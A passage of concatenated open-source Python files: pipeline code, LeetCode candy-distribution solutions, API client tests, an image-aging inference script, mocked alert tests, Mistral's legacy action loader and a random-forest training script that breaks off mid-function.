assert (self.parent)
pipeline_base_path = self.parent.parent.base_path()
if not file_dependencies.is_modified(self.node_path(), dependency_type,
pipeline_base_path,
self.file_dependencies):
logger.log('no changes')
return True
if not super().run():
return False
if self.file_dependencies:
file_dependencies.update(self.node_path(), dependency_type, pipeline_base_path, self.file_dependencies)
return True
def shell_command(self):
return f'{shlex.quote(sys.executable)} -u "{self.parent.parent.base_path() / self.file_name}" {" ".join(map(str, self.args))}'
def html_doc_items(self):
path = self.parent.parent.base_path() / self.file_name
return [
('file name', _.i[self.file_name]),
('args', _.tt[json.dumps(self.args)]),
(_.i['content'], html.highlight_syntax(path.read_text().strip('\n') if path.exists() else '',
'python')),
(_.i['shell command'], html.highlight_syntax(self.shell_command(), 'bash')),
('file dependencies', [_.i[dependency, _.br] for dependency in self.file_dependencies])
]
|
Algo and DSA/LeetCode-Solutions-master/Python/distribute-candies-to-people.py | Sourav692/FAANG-Interview-Preparation | 3,269 | 12663819 | <reponame>Sourav692/FAANG-Interview-Preparation
# Time: O(n + logc), c is the number of candies
# Space: O(1)
class Solution(object):
def distributeCandies(self, candies, num_people):
"""
:type candies: int
:type num_people: int
:rtype: List[int]
"""
# find max integer p s.t. sum(1 + 2 + ... + p) <= C
# => remaining : 0 <= C-(1+p)*p/2 < p+1
# => -2p-2 < p^2+p-2C <= 0
# => 2C+1/4 < (p+3/2)^2 and (p+1/2)^2 <= 2C+1/4
# => sqrt(2C+1/4)-3/2 < p <= sqrt(2C+1/4)-1/2
# => p = floor(sqrt(2C+1/4)-1/2)
p = int((2*candies + 0.25)**0.5 - 0.5)
remaining = candies - (p+1)*p//2
rows, cols = divmod(p, num_people)
result = [0]*num_people
for i in xrange(num_people):
result[i] = (i+1)*(rows+1) + (rows*(rows+1)//2)*num_people if i < cols else \
(i+1)*rows + ((rows-1)*rows//2)*num_people
result[cols] += remaining
return result
# Time: O(n + logc), c is the number of candies
# Space: O(1)
class Solution2(object):
def distributeCandies(self, candies, num_people):
"""
:type candies: int
:type num_people: int
:rtype: List[int]
"""
# find max integer p s.t. sum(1 + 2 + ... + p) <= C
left, right = 1, candies
while left <= right:
mid = left + (right-left)//2
if not ((mid <= candies*2 // (mid+1))):
right = mid-1
else:
left = mid+1
p = right
remaining = candies - (p+1)*p//2
rows, cols = divmod(p, num_people)
result = [0]*num_people
for i in xrange(num_people):
result[i] = (i+1)*(rows+1) + (rows*(rows+1)//2)*num_people if i < cols else \
(i+1)*rows + ((rows-1)*rows//2)*num_people
result[cols] += remaining
return result
# Time: O(sqrt(c)), c is the number of candies
# Space: O(1)
class Solution3(object):
def distributeCandies(self, candies, num_people):
"""
:type candies: int
:type num_people: int
:rtype: List[int]
"""
result = [0]*num_people
i = 0
while candies != 0:
result[i % num_people] += min(candies, i+1)
candies -= min(candies, i+1)
i += 1
return result
|
cape_webservices/tests/test_api/test_client.py | edwardmjackson/cape-webservices | 164 | 12663828 | <gh_stars>100-1000
# Copyright 2018 BLEMUNDSBURY AI LIMITED
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from cape.client.exceptions import CapeException
from cape_webservices.tests.test_api.conftest import CapeClient, API_URL
import pytest, time
# pytest automatically imports cape_client fixture in conftest.py
def test_token(cape_client):
token = cape_client.get_user_token()
assert token
def test_admin_token(cape_client):
admin_token = cape_client.get_admin_token()
# Authenticate another client using the admin token
cape_client2 = CapeClient(API_URL, admin_token)
token = cape_client2.get_user_token()
assert token == cape_client.get_user_token()
def test_saved_replies(cape_client):
# Get Saved Replies
saved_replies = cape_client.get_saved_replies()['items']
# Delete all existing saved replies
for saved_reply in saved_replies:
cape_client.delete_saved_reply(saved_reply['id'])
assert cape_client.get_saved_replies()['totalItems'] == 0
# Create saved replies
reply_id = cape_client.create_saved_reply(question='Question', answer='Answer')['replyId']
cape_client.create_saved_reply(question='Another Question', answer='Another Answer')
saved_replies = cape_client.get_saved_replies()['items']
assert len(saved_replies) == 2
# Check number_of_items and offset
saved_replies = cape_client.get_saved_replies(number_of_items=1)['items']
assert len(saved_replies) == 1
saved_replies = cape_client.get_saved_replies(offset=1)['items']
assert len(saved_replies) == 1
# Search
saved_replies = cape_client.get_saved_replies(search_term='another')
assert saved_replies['totalItems'] == 1
# Check searchReplyId
specific_replies = cape_client.get_saved_replies(saved_reply_ids=[saved_replies['items'][0]['id']])
assert specific_replies['items'][0]['id'] == saved_replies['items'][0]['id']
# Add paraphrase questions
paraphrase_id = cape_client.add_paraphrase_question(reply_id, question='Paraphrase Question')
cape_client.add_paraphrase_question(reply_id, question='Another Paraphrase Question')
cape_client.add_paraphrase_question(reply_id, question='Yet Another Paraphrase Question')
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['paraphraseQuestions']) == 3
else:
assert len(saved_reply['paraphraseQuestions']) == 0
# Modify paraphrase question
modified_paraphrase_text = 'Modified Paraphrase Question'
cape_client.edit_paraphrase_question(paraphrase_id, modified_paraphrase_text)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
for paraphrase_question in saved_reply['paraphraseQuestions']:
if paraphrase_question['id'] == paraphrase_id:
assert paraphrase_question['question'] == modified_paraphrase_text
else:
assert paraphrase_question['question'] != modified_paraphrase_text
# Delete paraphrase question
cape_client.delete_paraphrase_question(paraphrase_id)
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['paraphraseQuestions']) == 2
else:
assert len(saved_reply['paraphraseQuestions']) == 0
# Modify the canonical question
modified_canonical_question = 'Modified Canonical Question'
cape_client.edit_canonical_question(reply_id, modified_canonical_question)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
assert saved_reply['canonicalQuestion'] == modified_canonical_question
# Add answers
answer_id = cape_client.add_answer(reply_id, answer='Added Answer')
cape_client.add_answer(reply_id, answer='Another Answer')
cape_client.add_answer(reply_id, answer='Yet Another Answer')
cape_client.add_answer(reply_id, answer='You guessed right, another answer')
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['answers']) == 5
else:
assert len(saved_reply['answers']) == 1
# Modify answer
modified_answer_text = 'Modified Answer Text'
cape_client.edit_answer(answer_id, modified_answer_text)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
for answer in saved_reply['answers']:
if answer['id'] == answer_id:
assert answer['answer'] == modified_answer_text
else:
assert answer['answer'] != modified_answer_text
# Delete answer
cape_client.delete_answer(answer_id)
for saved_reply in cape_client.get_saved_replies()['items']:
if saved_reply['id'] == reply_id:
assert len(saved_reply['answers']) == 4
else:
assert len(saved_reply['answers']) == 1
# Try to delete an answer from a saved reply with only 1 answer
reply_id = cape_client.create_saved_reply('New Question', 'New Answer')['replyId']
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
answer_id = saved_reply['answers'][0]['id']
with pytest.raises(CapeException):
cape_client.delete_answer(answer_id)
saved_reply = \
[saved_reply for saved_reply in cape_client.get_saved_replies()['items'] if saved_reply['id'] == reply_id][0]
assert len(saved_reply['answers']) == 1
def test_annotations(cape_client):
cape_client.add_annotation('Where is the cat?', 'On the mat', 'Animals', start_offset=12, end_offset=24)
annotations = cape_client.get_annotations(search_term='cat')
assert annotations['totalItems'] == 1
response = cape_client.add_annotation('Where is the dog?', 'On the log', 'Animals', start_offset=34, end_offset=58)
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['totalItems'] == 1
answers = cape_client.answer('Where is the dog?')
assert answers[0]['answerText'] == 'On the log'
assert answers[0]['sourceType'] == 'annotation'
assert answers[0]['metadata']['startOffset'] == 34
annotations = cape_client.get_annotations(document_ids=['Animals'])
assert annotations['totalItems'] == 2
answer_id = cape_client.add_annotation_answer(response['annotationId'], 'Another answer')
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert len(annotations['items'][0]['answers']) == 2
cape_client.edit_annotation_answer(answer_id, 'Yet another answer')
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['answers'][1]['answer'] == 'Yet another answer'
cape_client.delete_annotation_answer(answer_id)
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert len(annotations['items'][0]['answers']) == 1
cape_client.edit_annotation_canonical_question(response['annotationId'], "New question?")
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['canonicalQuestion'] == "New question?"
question_id = cape_client.add_annotation_paraphrase_question(response['annotationId'], "Another question?")
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['paraphraseQuestions'][0]['question'] == "Another question?"
cape_client.edit_annotation_paraphrase_question(question_id, "Yet another question?")
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert annotations['items'][0]['paraphraseQuestions'][0]['question'] == "Yet another question?"
cape_client.delete_annotation_paraphrase_question(question_id)
annotations = cape_client.get_annotations(annotation_ids=[response['annotationId']])
assert len(annotations['items'][0]['paraphraseQuestions']) == 0
cape_client.delete_annotation(response['annotationId'])
annotations = cape_client.get_annotations(document_ids=['Animals'])
assert annotations['totalItems'] == 1
cape_client.add_annotation('Where is the cat?', 'On my hat', 'Strange Animals', start_offset=12, end_offset=24)
answers = cape_client.answer('Where is the cat?', document_ids=['Animals'])
assert answers[0]['answerText'] == 'On the mat'
answers = cape_client.answer('Where is the cat?', document_ids=['Strange Animals'])
assert answers[0]['answerText'] == 'On my hat'
cape_client.add_annotation('Does this have metadata?', 'Yes', 'Custom Stuff', start_offset=0, end_offset=3,
metadata={
'custom_field': 'testing'
})
answers = cape_client.answer('Does this have metadata?', document_ids=['Custom Stuff'])
assert answers[0]['metadata']['custom_field'] == 'testing'
for annotation in cape_client.get_annotations()['items']:
cape_client.delete_annotation(annotation['id'])
with pytest.raises(CapeException):
cape_client.delete_annotation('fakeid')
with pytest.raises(CapeException):
cape_client.add_annotation_answer('fakeid', 'fake answer')
with pytest.raises(CapeException):
cape_client.delete_annotation_answer('fakeid')
with pytest.raises(CapeException):
cape_client.edit_annotation_answer('fakeid', 'fake answer')
with pytest.raises(CapeException):
cape_client.edit_annotation_canonical_question('fakeid', 'fake question')
with pytest.raises(CapeException):
cape_client.add_annotation_paraphrase_question('fakeid', 'fake question')
with pytest.raises(CapeException):
cape_client.edit_annotation_paraphrase_question('fakeid', 'fake question')
with pytest.raises(CapeException):
cape_client.delete_annotation_paraphrase_question('fakeid')
with pytest.raises(CapeException):
cape_client.add_annotation('Do we have both a start and end offset?', 'No', 'Failures', end_offset=43)
with pytest.raises(CapeException):
cape_client.add_annotation('Do we have both a start and end offset?', 'No', 'Failures', start_offset=12)
def test_invalid_delete_reply(cape_client):
with pytest.raises(CapeException):
cape_client.delete_saved_reply('fake')
def test_invalid_edit_canonical_question(cape_client):
with pytest.raises(CapeException):
cape_client.edit_canonical_question('fake', 'Test')
def test_invalid_add_paraphrase_question(cape_client):
with pytest.raises(CapeException):
cape_client.add_paraphrase_question('fake', 'Test')
def test_invalid_edit_paraphrase_question(cape_client):
with pytest.raises(CapeException):
cape_client.edit_paraphrase_question('fake', 'Test')
def test_invalid_delete_paraphrase_question(cape_client):
with pytest.raises(CapeException):
cape_client.delete_paraphrase_question('fake')
def test_invalid_add_answer(cape_client):
with pytest.raises(CapeException):
cape_client.add_answer('fake', 'Test')
def test_invalid_edit_answer(cape_client):
with pytest.raises(CapeException):
cape_client.edit_answer('fake', 'Test')
def test_documents(cape_client):
cape_client.upload_document(title='Test', text='Testing', origin='A test', replace=True)
documents = cape_client.get_documents()['items']
assert len(documents) > 0
for document in documents:
cape_client.delete_document(document['id'])
documents = cape_client.get_documents()['items']
assert len(documents) == 0
def test_answer(cape_client):
documents = cape_client.get_documents()['items']
for document in documents:
cape_client.delete_document(document['id'])
cape_client.upload_document(title='Sky', text='The sky is blue.', origin='sky.txt', replace=True)
answers = cape_client.answer('What colour is the sky?', source_type="document")
assert answers[0]['answerText'] == 'blue'
def test_answer_inline(cape_client):
documents = cape_client.get_documents()['items']
for document in documents:
cape_client.delete_document(document['id'])
answers = cape_client.answer('What colour is the sky?', source_type="document", text="The sky is blue")
assert answers[0]['answerText'] == 'blue'
def test_answer_from_saved_replies(cape_client_answer):
cape_client = cape_client_answer
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a dog?', answer='A dog is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a horse?', answer='A horse is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a cat?', answer='A cat is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a fish?', answer='A fish is a pet')
print(cape_client.get_saved_replies()['totalItems'])
cape_client.create_saved_reply(question='What is a potato?', answer='A potato is a vegetable')
print(cape_client.get_saved_replies()['totalItems'])
assert cape_client.get_saved_replies()['totalItems'] == 5
# Answer
answers = cape_client.answer('What is a fish?', source_type="saved_reply")
assert answers[0]['answerText'] == 'A fish is a pet'
def test_inbox(cape_client):
events = cape_client.get_inbox()['items']
for event in events:
cape_client.archive_inbox(event['id'])
events = cape_client.get_inbox()['items']
assert len(events) == 0
cape_client.answer('What colour is the sky?')
# HACK: Saving inbox events is sent to a worker and doesn't block, so we can't know for sure when it finishes
time.sleep(1)
events = cape_client.get_inbox()['items']
item = events[0]
assert len(events) == 1
events = cape_client.get_inbox(read=True)['items']
assert len(events) == 0
cape_client.mark_inbox_read(item['id'])
events = cape_client.get_inbox(read=True)['items']
assert len(events) == 1
cape_client.archive_inbox(item['id'])
events = cape_client.get_inbox(read=True)['items']
assert len(events) == 0
def test_default_threshold(cape_client):
cape_client.set_default_threshold('high')
threshold = cape_client.get_default_threshold()
assert threshold == 'high'
cape_client.set_default_threshold('medium')
threshold = cape_client.get_default_threshold()
assert threshold == 'medium'
def test_invalid_threshold(cape_client):
with pytest.raises(CapeException):
cape_client.set_default_threshold('potato')
def test_user_profile(cape_client):
profile = cape_client.get_profile()
assert profile == {'username': 'testuser', 'plan': 'free', 'termsAgreed': False, 'onboardingCompleted': False,
'forwardEmail': None,'forwardEmailVerified':False}
def test_spans(cape_client: CapeClient):
for document in cape_client.get_documents()['items']:
cape_client.delete_document(document['id'])
for saved_reply in cape_client.get_saved_replies()['items']:
cape_client.delete_saved_reply(saved_reply['id'])
texts = {}
texts['Pizza'] = 'I like pizzas.'
texts['Sky'] = "The sky is blue."
texts['Colour'] = "My favorite colour is red"
questions = {"Do you like pizzas ?", "What is red?", "what is sky?"}
for title, text in texts.items():
cape_client.upload_document(title, text, document_id=title)
for question in questions:
answer = cape_client.answer(question)[0]
assert answer['answerText'] in answer['answerContext']
assert answer['answerText'] == texts[answer['sourceId']][
answer['answerTextStartOffset']:answer['answerTextEndOffset']]
assert answer['answerContext'] == texts[answer['sourceId']][
answer['answerContextStartOffset']:answer['answerContextEndOffset']]
for document in cape_client.get_documents()['items']:
cape_client.delete_document(document['id'])
for saved_reply in cape_client.get_saved_replies()['items']:
cape_client.delete_saved_reply(saved_reply['id'])
|
scripts/inference.py | thienquang199x/SAM | 351 | 12663836 | <filename>scripts/inference.py
from argparse import Namespace
import os
import time
from tqdm import tqdm
from PIL import Image
import numpy as np
import torch
from torch.utils.data import DataLoader
import sys
sys.path.append(".")
sys.path.append("..")
from configs import data_configs
from datasets.inference_dataset import InferenceDataset
from datasets.augmentations import AgeTransformer
from utils.common import tensor2im, log_image
from options.test_options import TestOptions
from models.psp import pSp
def run():
test_opts = TestOptions().parse()
out_path_results = os.path.join(test_opts.exp_dir, 'inference_results')
out_path_coupled = os.path.join(test_opts.exp_dir, 'inference_coupled')
os.makedirs(out_path_results, exist_ok=True)
os.makedirs(out_path_coupled, exist_ok=True)
# update test options with options used during training
ckpt = torch.load(test_opts.checkpoint_path, map_location='cpu')
opts = ckpt['opts']
opts.update(vars(test_opts))
opts = Namespace(**opts)
net = pSp(opts)
net.eval()
net.cuda()
age_transformers = [AgeTransformer(target_age=age) for age in opts.target_age.split(',')]
print(f'Loading dataset for {opts.dataset_type}')
dataset_args = data_configs.DATASETS[opts.dataset_type]
transforms_dict = dataset_args['transforms'](opts).get_transforms()
dataset = InferenceDataset(root=opts.data_path,
transform=transforms_dict['transform_inference'],
opts=opts)
dataloader = DataLoader(dataset,
batch_size=opts.test_batch_size,
shuffle=False,
num_workers=int(opts.test_workers),
drop_last=False)
if opts.n_images is None:
opts.n_images = len(dataset)
global_time = []
for age_transformer in age_transformers:
print(f"Running on target age: {age_transformer.target_age}")
global_i = 0
for input_batch in tqdm(dataloader):
if global_i >= opts.n_images:
break
with torch.no_grad():
input_age_batch = [age_transformer(img.cpu()).to('cuda') for img in input_batch]
input_age_batch = torch.stack(input_age_batch)
input_cuda = input_age_batch.cuda().float()
tic = time.time()
result_batch = run_on_batch(input_cuda, net, opts)
toc = time.time()
global_time.append(toc - tic)
for i in range(len(input_batch)):
result = tensor2im(result_batch[i])
im_path = dataset.paths[global_i]
if opts.couple_outputs or global_i % 100 == 0:
input_im = log_image(input_batch[i], opts)
resize_amount = (256, 256) if opts.resize_outputs else (1024, 1024)
res = np.concatenate([np.array(input_im.resize(resize_amount)),
np.array(result.resize(resize_amount))], axis=1)
age_out_path_coupled = os.path.join(out_path_coupled, age_transformer.target_age)
os.makedirs(age_out_path_coupled, exist_ok=True)
Image.fromarray(res).save(os.path.join(age_out_path_coupled, os.path.basename(im_path)))
age_out_path_results = os.path.join(out_path_results, age_transformer.target_age)
os.makedirs(age_out_path_results, exist_ok=True)
image_name = os.path.basename(im_path)
im_save_path = os.path.join(age_out_path_results, image_name)
Image.fromarray(np.array(result.resize(resize_amount))).save(im_save_path)
global_i += 1
stats_path = os.path.join(opts.exp_dir, 'stats.txt')
result_str = 'Runtime {:.4f}+-{:.4f}'.format(np.mean(global_time), np.std(global_time))
print(result_str)
with open(stats_path, 'w') as f:
f.write(result_str)
def run_on_batch(inputs, net, opts):
result_batch = net(inputs, randomize_noise=False, resize=opts.resize_outputs)
return result_batch
if __name__ == '__main__':
run()
|
tests/unit/resources/activity/test_alerts.py | doziya/hpeOneView | 107 | 12663877 | <filename>tests/unit/resources/activity/test_alerts.py
# -*- coding: utf-8 -*-
###
# (C) Copyright (2012-2017) Hewlett Packard Enterprise Development LP
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the 'Software'), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED 'AS IS', WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.activity.alerts import Alerts
from hpOneView.resources.resource import ResourceClient
class AlertsTest(TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host)
self._client = Alerts(self.connection)
@mock.patch.object(ResourceClient, 'get_all')
def test_get_all(self, mock_get):
self._client.get_all(filter="name='name'",
sort='name:ascending',
view='day')
mock_get.assert_called_once_with(count=-1,
filter="name='name'",
query='', sort='name:ascending', start=0, view='day')
@mock.patch.object(ResourceClient, 'get')
def test_get_specific(self, mock_get):
self._client.get('35323930-4936-4450-5531-303153474820')
mock_get.assert_called_once_with('35323930-4936-4450-5531-303153474820')
@mock.patch.object(ResourceClient, 'get_by')
def test_get_by_called_once(self, mock_get_by):
self._client.get_by('alertState', 'Active')
mock_get_by.assert_called_once_with('alertState', 'Active')
@mock.patch.object(ResourceClient, 'update')
def test_update_should_fail_when_no_uri_is_provided(self, mock_update):
resource = {
'alertState': 'Cleared',
'assignedToUser': 'Paul',
'alertUrgency': 'None',
'notes': 'Problem fixed',
'eTag': '2014-03-28T04:40:06.831Z'
}
self.assertRaises(ValueError, self._client.update, resource)
@mock.patch.object(ResourceClient, 'update')
def test_update_should_use_given_values_by_resource_uri(self, mock_update):
resource = {
'uri': '/rest/alerts/26',
'alertState': 'Cleared',
'assignedToUser': 'Paul',
'alertUrgency': 'None',
'notes': 'Problem fixed',
'eTag': '2014-03-28T04:40:06.831Z'
}
self._client.update(resource.copy(), '/rest/alerts/26')
resource_test = resource.copy()
del resource_test["uri"]
mock_update.assert_called_once_with(resource=resource_test, timeout=-1, uri='/rest/alerts/26')
@mock.patch.object(ResourceClient, 'update')
def test_update_should_use_given_values_by_uri_param(self, mock_update):
resource = {
'alertState': 'Cleared',
'assignedToUser': 'Paul',
'alertUrgency': 'None',
'notes': 'Problem fixed',
'eTag': '2014-03-28T04:40:06.831Z'
}
self._client.update(resource, '/rest/alerts/26')
mock_update.assert_called_once_with(resource=resource.copy(), timeout=-1, uri='/rest/alerts/26')
@mock.patch.object(ResourceClient, 'delete')
def test_delete_called_once(self, mock_delete):
id_alert = '35323930-4936-4450-5531-303153474820'
self._client.delete(id_alert)
mock_delete.assert_called_once_with(id_alert)
@mock.patch.object(ResourceClient, 'delete')
def test_delete_alert_change_log_called_once_by_id(self, mock_delete):
id_alert = '20'
self._client.delete_alert_change_log(id_alert)
mock_delete.assert_called_once_with({'uri': '/rest/alerts/AlertChangeLog/20'})
@mock.patch.object(ResourceClient, 'delete_all')
def test_delete_all_called_once(self, mock_delete):
self._client.delete_all('name="name"')
mock_delete.assert_called_once_with(filter='name="name"', timeout=-1)
@mock.patch.object(ResourceClient, 'delete')
def test_delete_alert_change_log_called_once_by_uri(self, mock_delete):
uri = '/rest/alerts/AlertChangeLog/20'
self._client.delete_alert_change_log(uri)
mock_delete.assert_called_once_with(
{'uri': uri})
|
tests/unit/test_common_subprocess.py | windies21/loopchain | 105 | 12663892 | <reponame>windies21/loopchain
"""Test Common Process"""
import logging
import time
import unittest
from loopchain.baseservice import CommonSubprocess
from loopchain.utils import loggers
loggers.set_preset_type(loggers.PresetType.develop)
loggers.update_preset()
class TestCommonSubprocess(unittest.TestCase):
def test_common_subprocess(self):
# GIVEN
process_args = ['ls']
logging.debug(f"run common subprocess....")
subprocess = CommonSubprocess(process_args)
logging.debug(f"after run common subprocess....")
subprocess.start()
subprocess.start()
subprocess.start()
self.assertTrue(subprocess.is_run())
# WHEN
time.sleep(2)
subprocess.stop()
subprocess.wait()
subprocess.wait()
subprocess.stop()
# THEN
self.assertFalse(subprocess.is_run())
if __name__ == '__main__':
unittest.main()
|
mistral/actions/legacy.py | shubhamdang/mistral | 205 | 12663904 | # Copyright 2020 Nokia Software.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import collections
from oslo_config import cfg
from oslo_log import log as logging
from stevedore import extension
from mistral_lib import actions as ml_actions
from mistral_lib.utils import inspect_utils as i_utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
class GeneratedPythonActionDescriptor(ml_actions.PythonActionDescriptor):
"""Represents a legacy python action generated by a generator.
It's needed temporarily until we fully refactor OpenStack actions in the
'mistral-extra' project. The difference of this descriptor and the standard
PythonActionDescriptor class is how they initialize a spec of parameters
and description.
"""
def __init__(self, name, action_cls, action_cls_attrs=None, namespace='',
project_id=None, scope=None, desc=None, params_spec=None):
super(GeneratedPythonActionDescriptor, self).__init__(
name,
action_cls,
action_cls_attrs,
namespace,
project_id,
scope
)
if desc:
self._desc = desc
if params_spec:
self._params_spec = params_spec
def __repr__(self):
return 'Generated Python action [name=%s, cls=%s, params_spec=%s]' % (
self.name,
self.action_class,
self.params_spec
)
class LegacyActionProvider(ml_actions.ActionProvider):
"""Represents the old way of configuring actions.
There are two sources where this action provider loads actions
from:
* Action classes configured in the entry point "mistral.actions"
* Action classes generated by generators configured in the
entry point "mistral.generators" as a function returning a
collection of them.
"""
def __init__(self, name='legacy'):
super().__init__(name)
# TODO(rakhmerov): Come up with a convenient structure to keep action
# classes indexed so that we could search and filter easily.
self._action_descs = collections.OrderedDict()
self._load_actions()
def _load_actions(self):
self._load_action_plugins()
self._load_action_generators()
def _load_action_plugins(self):
if not CONF.legacy_action_provider.load_action_plugins:
return
LOG.info(
"Loading actions plugged in with the entry point "
"'mistral.actions'..."
)
ext_mgr = extension.ExtensionManager(
namespace='mistral.actions',
invoke_on_load=False
)
for action_name in ext_mgr.names():
action_cls = ext_mgr[action_name].plugin
if CONF.legacy_action_provider.only_builtin_actions:
if not action_cls.__module__.startswith('mistral.'):
continue
action_desc = ml_actions.PythonActionDescriptor(
action_name,
action_cls,
namespace=''
)
self._action_descs[action_name] = action_desc
LOG.debug('Registered action: %s', action_desc)
def _load_action_generators(self):
if not CONF.legacy_action_provider.load_action_generators:
return
LOG.info(
"Loading actions from the action generators plugged in "
"with the entry point 'mistral.generators'"
)
for gen in self._get_action_generators():
self._register_generator_actions(gen)
@staticmethod
def _get_action_generators():
res = []
ext_mgr = extension.ExtensionManager(
namespace='mistral.generators',
invoke_on_load=True
)
# TODO(rakhmerov): this is all ugly. It turns out that the only
# way to register actions via generators is to register a special
# function in the entry point that returns a list of generators.
# But we can't directly register a generator.
for ext in ext_mgr:
if ext.obj is not None:
for gen in ext.obj:
res.append(gen)
return res
def _register_generator_actions(self, generator):
# TODO(rakhmerov): Here we have an implicit dependency on
# "mistral-extra" because ActionGenerator class is defined
# in "mistral-extra". Of course, it works because of duck
# typing but architecture wise it's just very bad. "mistral"
# must not depend on "mistral-extra" because the latter is
# just a project with mistral extensions. In fact, we can't
# even extend ActionGenerator class within "mistral" for
# testing purposes.
# So it's all done this way for compatibility until all
# OpenStack actions are redesigned with action providers.
for action in generator.create_actions():
action_desc = GeneratedPythonActionDescriptor(
action['name'],
generator.base_action_class,
i_utils.get_public_fields(action['class']),
desc=action['description'],
params_spec=action['arg_list']
)
LOG.debug('Registered action: %s', action_desc)
self._action_descs[action['name']] = action_desc
def find(self, action_name, namespace=None):
return self._action_descs.get(action_name)
def find_all(self, namespace=None, limit=None, sort_fields=None,
sort_dirs=None, **filters):
# TODO(rakhmerov): Apply sort_keys, sort_dirs, and filters.
return self._action_descs.values()
|
02_Python/Random_Forest_Classifier.py | milaan9/Clustering_Algorithms_from_Scratch | 126 | 12663913 | <filename>02_Python/Random_Forest_Classifier.py
import pandas as pd
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
RSEED = 50
# Load in data
df = pd.read_csv('https://s3.amazonaws.com/projects-rf/clean_data.csv')
# Full dataset: https://www.kaggle.com/cdc/behavioral-risk-factor-surveillance-system
# Extract the labels
labels = np.array(df.pop('label'))
# 30% examples in test data
train, test, train_labels, test_labels = train_test_split(df,
labels,
stratify = labels,
test_size = 0.3,
random_state = RSEED)
# Imputation of missing values
train = train.fillna(train.mean())
test = test.fillna(test.mean())
# Features for feature importances
features = list(train.columns)
# Create the model with 100 trees
model = RandomForestClassifier(n_estimators=100,
random_state=RSEED,
max_features = 'sqrt',
n_jobs=-1, verbose = 1)
# Fit on training data
model.fit(train, train_labels)
n_nodes = []
max_depths = []
# Stats about the trees in random forest
for ind_tree in model.estimators_:
n_nodes.append(ind_tree.tree_.node_count)
max_depths.append(ind_tree.tree_.max_depth)
print(f'Average number of nodes {int(np.mean(n_nodes))}')
print(f'Average maximum depth {int(np.mean(max_depths))}')
# Training predictions (to demonstrate overfitting)
train_rf_predictions = model.predict(train)
train_rf_probs = model.predict_proba(train)[:, 1]
# Testing predictions (to determine performance)
rf_predictions = model.predict(test)
rf_probs = model.predict_proba(test)[:, 1]
from sklearn.metrics import precision_score, recall_score, roc_auc_score, roc_curve
import matplotlib.pyplot as plt
# Plot formatting
plt.style.use('fivethirtyeight')
plt.rcParams['font.size'] = 18
def evaluate_model(predictions, probs, train_predictions, train_probs):
"""Compare machine learning model to baseline performance.
Computes statistics and shows ROC curve."""
baseline = {}
baseline['recall'] = recall_score(test_labels,
[1 for _ in range(len(test_labels))])
baseline['precision'] = precision_score(test_labels,
[1 for _ in range(len(test_labels))])
baseline['roc'] = 0.5
results = {}
results['recall'] = recall_score(test_labels, predictions)
results['precision'] = precision_score(test_labels, predictions)
results['roc'] = roc_auc_score(test_labels, probs)
train_results = {}
train_results['recall'] = recall_score(train_labels, train_predictions)
train_results['precision'] = precision_score(train_labels, train_predictions)
train_results['roc'] = roc_auc_score(train_labels, train_probs)
for metric in ['recall', 'precision', 'roc']:
